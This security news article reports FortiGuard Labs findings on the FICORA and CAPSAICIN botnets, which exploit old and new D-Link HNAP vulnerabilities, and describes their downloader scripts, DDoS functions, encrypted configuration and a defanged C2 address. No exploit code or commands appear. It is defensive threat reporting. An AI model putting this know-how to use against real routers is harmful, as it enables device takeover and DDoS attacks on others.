CVE-2024-33112 and More: How FICORA and CAPSAICIN Botnets Are Exploiting D-Link Devices

FortiGuard Labs has observed a notable spike in activity from two notorious botnets, FICORA and CAPSAICIN, during October and November of 2024. These botnets exploit long-standing vulnerabilities in D-Link devices to launch widespread attacks.

The vulnerabilities targeted by these botnets, some dating back nearly a decade, include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and the more recent CVE-2024-33112. These flaws, found in the HNAP (Home Network Administration Protocol) interface, allow attackers to remotely execute malicious commands. Despite being well-documented, these weaknesses continue to pose significant risks due to the proliferation of unpatched devices.

FortiGuard Labs highlighted the ongoing relevance of such vulnerabilities, stating, “Attackers frequently reuse older attacks, which accounts for the continued spread of the ‘FICORA’ and ‘CAPSAICIN’ botnets.”

The FICORA botnet, a variant of the infamous Mirai malware, employs a shell script named “multi” to download and execute its payload. This downloader script adapts to various Linux architectures, targeting systems ranging from ARM to SPARC. The malware is equipped with DDoS capabilities, leveraging protocols like UDP, TCP, and DNS to disrupt networks.

Hard-coded password list | Source: FortiGuard

A unique feature of FICORA is its use of the ChaCha20 encryption algorithm to encode its configuration, including its command-and-control (C2) server details. The report noted that “The scanner in FICORA includes a hard-coded username and password for its brute-force attack function,” indicating its aggressive propagation methods.

In contrast to FICORA’s global reach, the CAPSAICIN botnet exhibited a short burst of activity, primarily targeting East Asian countries on October 21 and 22, 2024. Delivered via a downloader script named “bins.sh,” CAPSAICIN focuses on dominating its victim hosts by killing known botnet processes.

This botnet, believed to be based on versions of malware developed by the Keksec group, incorporates a wide array of attack functions, including DDoS commands and environment variable manipulations. FortiGuard Labs’ analysis revealed its sophistication: “CAPSAICIN establishes a connection socket with its C2 server, “192[.]110[.]247[.]46,” and sends the victim host’s OS information and the nickname given by the malware back to the C2 server.”

Related Posts:

• APT organization steals D-Link company digital certificate to sign its malware
• Code for exploiting Zero Day Huawei Router Vulnerability is public
• From 7,000 to 13,000: The Alarming Growth of the 7777 Botnet
• D-Link router and modem vulnerabilities are being exploited by Satori IoT botnet
• FBI Warns of PRC-Linked Botnet Targeting Critical Systems, 260,000+ Devices Compromised